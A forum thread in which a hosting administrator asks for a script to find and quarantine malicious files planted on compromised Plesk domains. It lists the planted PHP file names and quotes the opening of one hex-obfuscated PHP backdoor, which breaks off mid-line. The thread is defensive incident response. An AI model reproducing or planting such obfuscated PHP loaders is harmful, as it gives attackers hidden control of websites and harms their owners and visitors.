Store fronts attached to legit domains :: Script to Read one Domains File after another

[KrazyBob]

I am looking for a bash script (or perl) that will locate the existence of certain files known to be hacks, like 1.x.txt and syslib.php, create a directory and then move these files into that directory. These are files that have been placed on the Plesk 8, 9 and 11 servers to basically take over an existing domain. One file, at.html, is actually and index file when called. All domains have a Store directory even though none was installed by the client. One variation is the creation of a sub directory called Temp in each hacked site. Our backups unfortunately grabbed the compromised sites and we want to delete the files and directories known to actually be scripts or contain harmful scripts. I don't know bash.

Can you help? I'm sure it will help others.

 

[KrazyBob]

Here is an example of some of the files planted. Note the misspelling of versins.php.

[root@server101 hack]# ls -ltu
total 508
----------  1 stephen psacln      0 May 31 01:40 index.php
----------  1 stephen psacln  90374 May 29 23:29 12345.php
----------  1 stephen psacln  12346 May 21 08:52 gtdeiz.php
----------  1 stephen psacln  11481 May  7 08:58 dxdfkcqe.php
----------  1 stephen psacln  12947 May  6 05:24 syslib.php
----------  1 stephen psacln 147273 May  5 01:16 versins.php
----------  1 stephen psacln  22543 Apr 28 03:40 right_column.php
----------  1 stephen psacln  11359 Apr 24 09:25 cvifhl.php
----------  1 stephen psacln  11359 Apr 24 09:25 vmjilwam.php
----------  1 stephen psacln  10319 Apr 24 05:40 eogevmgju.php
----------  1 stephen psacln  10319 Apr 24 05:40 vuwvqot.php
----------  1 stephen psacln 147273 Apr  7 01:00 version.php

Almost all contain encrypted code:

<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['ea35b4951'] = "\x43\x6c\x38\x50\x53\x6a\x22\x48\x69\x40\x2c\x65\x24\x60\x49\x55\x27\x5e\x5a\x6b\x35\x4c\x5f\x6e\x32\x79\xd\x3d\x41\x28\x72\x71\x67\x73\x78\x4f\x46\x23\x9\x37\x62\xa\x2d\x63\x34\x61\x54\x56\x75\x7b\x74\x44\x36\x64\x57\x4d\x52\x21\x5b\x68\x3e\x4a\x42\x2b\x7a\x30\x66\x76\x29\x47\x26\x39\x3b\x2e\x6f\x2f\x7c\x6d\x25\x31\x51\x70\x58\x4b\x5c\x3f\x3c\x4e\x7e\x5d\x77\x7d\x2a\x3a\x45\x20\x59\x33";
$GLOBALS[$GLOBALS